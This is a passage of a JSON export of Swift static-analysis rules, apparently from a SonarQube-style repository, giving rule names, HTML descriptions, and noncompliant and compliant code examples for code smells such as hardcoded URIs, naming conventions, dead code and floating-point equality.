be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif condition1 {\n if condition2 {\n doSomething()\n }\n}\n\nif let y = someOptional {\n if x > 0 {\n doSomething()\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif condition1 && condition2 {\n doSomething()\n}\n\nif let y = someOptional where x > 0 {\n doSomething()\n}\n\nif x > 0, let y = someOptional {\n doSomething()\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1075","repo":"swift","name":"URIs should not be hardcoded","htmlDesc":"<p>Hard coding a URI makes it difficult to test a program: path literals are not always portable across operating systems, a given absolute path may\nnot exist on a specific test environment, a specified Internet URL may not be available when executing the tests, production environment filesystems\nusually differ from the development environment, ...etc. For all those reasons, a URI should never be hard coded. Instead, it should be replaced by\ncustomizable parameter.<\/p>\n<p>Further even if the elements of a URI are obtained dynamically, portability can still be limited if the path-delimiters are hard-coded.<\/p>\n<p>This rule raises an issue when URI's or path delimiters are hard coded.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo {\n public func listUsers() -> [User] {\n var users:[User]\n let location = \"\/home\/mylogin\/Dev\/users.txt\" \/\/ Non-Compliant\n let fileContent = NSString(contentsOfFile: location, encoding: NSUTF8StringEncoding, error: nil)\n users = parse(fileContent!)\n return users\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo {\n \/\/ Configuration is a class that returns customizable properties: it can be mocked to be injected during tests.\n private var config:Configuration\n public init(myConfig:Configuration) {\n config = myConfig\n }\n public func listUsers() -> [User] {\n var users:[User]\n \/\/ Find here the way to get the correct folder, in this case using the Configuration object\n let location = config.getProperty(\"myApplication.listingFile\")\n \/\/ and use this parameter instead of the hard coded path\n let fileContent = NSString(contentsOfFile: location, encoding: NSUTF8StringEncoding, error: nil)\n users = parse(fileContent!)\n return users\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1105","repo":"swift","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif condition\n{\n doSomething()\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif condition {\n doSomething()\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Closure and inlined blocks (left and right curly braces on the same line) are ignored by this rule. <\/p>\n<pre>\nif condition {doSomething()} \/\/ Compliant\nreversed = sorted(\n names,\n { (s1: String, s2: String) -> Bool in \/\/ Compliant\n return s1 > s2\n })\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1109","repo":"swift","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif condition {\n doSomething()}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif condition {\n doSomething()\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered.<\/p>\n<pre>\nif condition {doSomething()}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1110","repo":"swift","name":"Redundant pairs of parentheses should be removed","htmlDesc":"<p>Useless parentheses can sometimes be misleading and so should be removed. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nreturn ((x + 1)) \/\/ Noncompliant\nvar x = ((y \/ 2 + 1)) \/\/ Noncompliant\nif ((x > 0)) { ... } \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn (x + 1)\nreturn x + 1\nvar x = (y \/ 2 + 1)\nvar x = y \/ 2 + 1\nif (x > 0) { ... }\nif x > 0 { ... }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1117","repo":"swift","name":"Local variables should not have the same name as fields or \"enum\" cases","htmlDesc":"<p>Shadowing fields or <code>enum<\/code> <code>case<\/code>s with a local variable is a bad practice that reduces code readability: It makes it\nconfusing to know whether the field or the variable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo {\n public var myField:Int = 0\n\n public func doSomething() {\n var myField = 0\n ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1133","repo":"swift","name":"Deprecated code should be removed","htmlDesc":"<p>This rule is meant to be used as a way to track code which is marked as being deprecated. Deprecated code should eventually be removed.<\/p>\n<p>The following code illustrates this rule:<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo {\n\n @availability(*, deprecated=1.1) \/\/ Noncompliant\n public func bar() {\n }\n\n @availability(*, obsoleted=1.1) \/\/ Noncompliant\n public func baz() {\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S114","repo":"swift","name":"Protocol names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\nprotocol names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic protocol myProtocol {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic protocol MyProtocol {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the protocol names against","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S1144","repo":"swift","name":"Unused \"private\" functions should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S115","repo":"swift","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nlet Pi = 3.14\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet pi = 3.14\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S116","repo":"swift","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n var MyField = 1\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n var myField = 1\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S117","repo":"swift","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S1172","repo":"swift","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the values passed to such parameters, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc doSomething(a: Int, b: Int) { \/\/ \"b\" is unused\n compute(a)\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvoid doSomething(a: Int) {\n compute(a)\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Override methods are excluded.<\/p>\n<pre>\noverride doSomething(a: Int, b: Int) { \/\/ no issue reported on b\n compute(a)\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1188","repo":"swift","name":"Closures should not have too many lines","htmlDesc":"<p>Closures are a very convenient and compact way to inject a behaviour without having to create a dedicated function. But those closures should be\nused only if the behaviour to be injected can be defined in a few lines of code, otherwise the source code can quickly become unreadable.<\/p>","status":"READY","tags":["rank5"],"langName":"Swift","params":[{"key":"max","htmlDesc":"Maximum allowed lines in a closure","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"swift:S119","repo":"swift","name":"Type parameter names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions make it possible for a team to collaborate efficiently. Following the established convention of single-letter type\nparameter names helps users and maintainers of your code quickly see the difference between a type parameter and a poorly named class.<\/p>\n<p>This rule check that all type parameter names match a provided regular expression. The following code snippets use the default regular\nexpression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z]$<\/code>:<\/p>\n<pre>\npublic class MyClass<TYPE> { \/\/ Noncompliant\n func method<TYPE>(t : TYPE) { \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyClass<T> {\n func method<T>(t : T) {\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the type parameter names against.","defaultValue":"^[A-Z]$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S122","repo":"swift","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif someCondition { doSomething()}\n...\nvar result = doSomething(); return result\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif someCondition {\n doSomething()\n}\n...\nvar result = doSomething()\nreturn result\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Variable declaration with initialising code block and closure expressions containing a single statement are ignored.<\/p>\n<pre>\nvar x : Int { return 0 } \/\/ Variable declaration with initialising code block\ndoSomething({ (x: Int, y: Int) -> Bool in return x > y }, 5) \/\/ Closure expression\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1244","repo":"swift","name":"Floating point numbers should not be tested for equality","htmlDesc":"<p>Floating point math is imprecise because of the challenges of storing such values in a binary representation. Even worse, floating point math is\nnot associative; push a <code>Float<\/code> or a <code>Double<\/code> through a series of simple mathematical operations and the answer will be\ndifferent based on the order of those operation because of the rounding that takes place at each step.<\/p>\n<p>Even simple floating point assignments are not simple:<\/p>\n<pre>\nvar f: Float = 0.1 \/\/ 0.1000000014901161193847656\nvar d: Double = 0.1 \/\/ 0.1000000000000000055511151\n<\/pre>\n<p>Therefore, the use of the equality (<code>==<\/code>) and inequality (<code>!=<\/code>) operators on <code>Float<\/code> or <code>Double<\/code> values\nis almost always an error. <\/p>\n<p>This rule checks for the use of direct and indirect equality\/inequailty tests on floats and doubles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myNumber: Float = 0.3 + 0.6\n\nif myNumber == 0.9 { \/\/ Noncompliant. Because of floating point imprecision, this will be false\n \/\/ ...\n}\n\nif myNumber <= 0.9 && myNumber >= 0.9 { \/\/ Noncompliant indirect equality test\n \/\/ ...\n}\n\nif myNumber < 0.9 || myNumber > 0.9 { \/\/ Noncompliant indirect inequality test\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.3 - Floating-point expressions shall not be tested for equality or inequality. <\/li>\n <li> MISRA C++:2008, 6-2-2 - Floating-point expressions shall not be directly or indirectly tested for equality or inequality <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S126","repo":"swift","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif x == 0 {\n doSomething()\n} else if x == 1 {\n doSomethingElse()\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif x == 0 {\n doSomething()\n} else if x == 1 {\n doSomethingElse()\n} else {\n NSException(name:\"IllegalStateException\", reason:\"Unreachable else clause is reached\", userInfo:nil).raise()\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1301","repo":"swift","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n case 0:\n doSomething();\n default:\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n doSomething();\n} else {\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1313","repo":"swift","name":"IP addresses should not be hardcoded","htmlDesc":"<p>Hardcoding an IP address into source code is a bad idea for several reasons:<\/p>\n<ul>\n <li> a recompile is required if the address changes <\/li>\n <li> it forces the same address to be used in every environment (dev, sys, qa, prod) <\/li>\n <li> it places the responsibility of setting the value to use in production on the shoulders of the developer <\/li>\n <li> it allows attackers to decompile the code and thereby discover a potentially sensitive address <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar host : NSHost = NSHost(address: \"127.0.0.1\")\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar host : NSHost = NSHost(address: configuration.ipAddress)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"VULNERABILITY"},{"key":"swift:S134","repo":"swift","name":"Control flow statements \"if\", \"for\", \"for in\", \"while\", \"do while\" and \"switch\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>for in<\/code>, <code>while<\/code>, <code>do while<\/code> and <code>switch<\/code> statements are a\nkey ingredient for making what's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if condition1 { \/\/ Compliant - depth = 1\n \/* ... *\/\n if condition2 { \/\/ Compliant - depth = 2\n \/* ... *\/\n for var i = 0; i < 10; i++ { \/\/ Compliant - depth = 3, not exceeding the limit\n \/* ... *\/\n if condition4 { \/\/ Non-Compliant - depth = 4\n if condition5 { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n \/* ... *\/\n }\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"swift:S139","repo":"swift","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = b + c \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\nvar a2 = b + c\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^\/\/\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S1481","repo":"swift","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic func numberOfMinutes(hours:Int) -> Int {\n var seconds = 0 \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic func numberOfMinutes(hours:Int) -> Int{\n return hours * 60\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Simple <code>for-in<\/code> loop counters are ignored by this rule because while they are often legitimately unused, their declaration is required\nby the syntax.<\/p>\n<pre>\nfor i in 1...10 { \/\/ Ignored\n print(\"Hello! \");\n}\n\nfor (a, b) in someElements { \/\/ Noncompliant; b unused\n print(a)\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1642","repo":"swift","name":"\"struct\" names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions enables teams to collaborate more efficiently. This rule checks that all <code>struct<\/code> names match a provided\nregular expression.<\/p>\n<p>Using the default regular expression: \"^[A-Z][a-zA-Z0-9]*$\"<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstruct my_struct {\n var one : Int\n var two : Int\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstruct MyStruct {\n var one : Int\n var two : Int\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression <code>struct<\/code> names should match.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S1751","repo":"swift","name":"Jump statements should not be used unconditionally","htmlDesc":"<p>Having an unconditional <code>break<\/code>, <code>return<\/code> in a loop renders it useless; the loop will only execute once and the loop\nstructure itself is simply wasted keystrokes.<\/p>\n<p>Having an unconditional <code>continue<\/code> in a loop can render the loop meaningless, or is itself wasted keystrokes, depending on where in the\nloop it occurs.<\/p>\n<p>Having an unconditional <code>return<\/code> anywhere other than at the end of a function or method simply renders all the rest of the code in the\nmethod useless.<\/p>\n<p>For these reasons, unconditional jump statements should never be used except for the final <code>return<\/code> in a function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i:Int\nfor (i = 0; i < 10; ++i) {\n print(\"i is \\(i)\")\n break \/\/ loop only executes once\n}\n\nfor (i = 0; i < 10; ++i) {\n continue\n print(\"i is \\(i)\") \/\/ this is never executed\n}\n\nfor (i = 0; i < 10; ++i) {\n print(\"i is \\(i)\")\n continue \/\/ this is meaningless; the loop would continue anyway\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i:Int\nfor (i = 0; i < 10; ++i){\n print(\"i is \\(i)\")\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.1 - There shall be no unreachable code. <\/li>\n <li> MISRA C++:2008, 0-1-1 - A <em>project<\/em> shall not contain <em>unreachable code<\/em>. <\/li>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code. <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S1763","repo":"swift","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>fallthrough<\/code>) move control flow out of the current\ncode block. Typically, any statements in a block that come after a jump are simply wasted keystrokes lying in wait to confuse the unwary. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc fun(a:Int)->Int{\n var i = 10;\n return i + a;\n i++; \/\/ this is never executed\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc fun(a:Int)->Int{\n var i = 10;\n return i + a;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.1 - There shall be no unreachable code <\/li>\n <li> MISRA C++:2008, 0-1-1 - A project shall not contain unreachable code <\/li>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.1 - A project shall not contain unreachable code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/uQCSBg\">CERT, MSC56-J.<\/a> - Detect and remove superfluous code and values <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S1764","repo":"swift","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif a == a { \/\/ always true\n doZ()\n}\nif a != a { \/\/ always false\n doY()\n}\nif a == b && a == b { \/\/ if the first one is true, the second one is too\n doX()\n}\nif a == b || a == b { \/\/ if the first one is true, the second one is too\n doW()\n}\n\nvar j = 5 \/ 5 \/\/always 1\nvar k = 5 - 5 \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\nvar i = 1 << 1; \/\/ Compliant\nvar j = a << a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP<\/a> - Detect and remove code that has no effect. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S1821","repo":"swift","name":"\"switch\" statements should not be nested","htmlDesc":"<p>Nested <code>switch<\/code> structures are difficult to understand because you can easily confuse the cases of an inner <code>switch<\/code> as\nbelonging to an outer statement. Therefore nested <code>switch<\/code> statements should be avoided.<\/p>\n<p>Specifically, you should structure your code to avoid the need for nested <code>switch<\/code> statements, but if you cannot, then consider moving\nthe inner <code>switch<\/code> to another function.<\/p>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1845","repo":"swift","name":"Methods and field names should not be the same or differ only by capitalization","htmlDesc":"<p>Looking at the set of methods in a <code>class<\/code>, <code>struct<\/code>, <code>enum<\/code>, or <code>extension<\/code> and finding two methods\nthat differ only by capitalization is confusing to users of the class. It is similarly confusing to have a method and a field or a case which differ\nonly in capitalization.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n var lookUp = false\n func lookup(){ } \/\/ Noncompliant; method name differs from field name only by capitalization\n func lookUP(){ } \/\/ Noncompliant; method name differs from field and another method name only by capitalization\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n var lookUp = false\n func getLookUp(){ }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S1854","repo":"swift","name":"Dead stores should be removed","htmlDesc":"<p>A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value\nonly to then overwrite it or throw it away, could indicate a serious error in the code. Even if it's not an error, it is at best a waste of resources.\nTherefore all calculated values should be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc calculateRate(a:Int, b:Int) {\n var i:Int\n\n i = a + b \/\/ Noncompliant; calculation result not used before value is overwritten\n i = doSomething() \/\/ Noncompliant; retrieved value not used\n for i = 0; i < 10; i++ {\n \/\/ ...\n }\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc calculateRate(a:Int, b:Int) {\n var i:Int\n\n i = doSomething()\n i += a + b\n storeI(i)\n\n for i = 0; i < 10; i++ {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/563.html\">MITRE, CWE-563<\/a> - Assignment to Variable without Use ('Unused Variable') <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/QYA5\">CERT, MSC13-C.<\/a> - Detect and remove unused values <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/S4IyAQ\">CERT, MSC13-CPP.<\/a> - Detect and remove unused values <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/uQCSBg\">CERT, MSC56-J.<\/a> - Detect and remove superfluous code and values <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect 